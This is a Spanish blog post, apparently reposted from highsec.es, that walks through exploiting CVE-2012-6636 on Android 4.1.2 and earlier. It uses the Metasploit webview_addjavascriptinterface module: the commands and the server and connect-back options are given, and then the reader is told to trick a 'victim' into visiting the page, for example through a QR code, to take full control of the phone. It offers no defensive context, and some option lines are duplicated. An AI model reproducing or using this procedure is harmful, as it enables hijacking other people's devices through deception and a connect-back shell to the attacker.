Hace un tiempo se descubrió una vulnerabilidad (CVE-2012-6636)
que afectaba a las versiónes menores o iguales a 4.1.2 de Android
(aproximadamente un 70% de dispositivos) la cual, explotaba un fallo en
el navegador web de android gracias a un Javascript que permitia
hacernos con el control del dispositivo.
La explotación de dicha vulnerabilidad es muy sencilla, solo es
necesario un poco de habilidad en Ingenieria social, Metasploit y una
victima con Android 4.1.2.
Para explotar esta vulnerabilidad, primero, ponemos en funcionamiento Metasploit:
sudo msfconsole |
Una vez este todo preparado, pasamos a cargar el exploit:
msf > use exploit/android/browser/webview_addjavascriptinterface |
Acto seguido pasamos a editar la configuración de dicho exploit:
· SVRHOST = IP de servidor web que aloja el Javascript (Nuestra IP)
· URIPATH = Directorio en el servidor web donde se alojará el Script (Por ejemplo exploit o fotos)
· LHOST = IP a la que la victima se conectara una vez el exploit se haya ejecutado con éxito (Nuestra IP)
· URIPATH = Directorio en el servidor web donde se alojará el Script (Por ejemplo exploit o fotos)
· LHOST = IP a la que la victima se conectara una vez el exploit se haya ejecutado con éxito (Nuestra IP)
Si todo está en ordén, ya podemos poner en marcha nuestro exploit, el
cual creará un servidor web para alojar el script y se pondrá a la
escucha de nuevas conexiones:
exploit |
Ahora solo quedaria hacer que la victima se conecte a nuestra Web
para que el exploit tenga exto, como? mediante pura Ingeniera Social,
por ejemplo, mediante un codigo QR. Si se conecta, tendremos el control
total de su dispositivo.
Un Saludo!
Autor: SalvaCorts
Fuente: http://highsec.es/2014/09/hackeando-android-4-1-2/
Entradas
No hay comentarios:
Publicar un comentario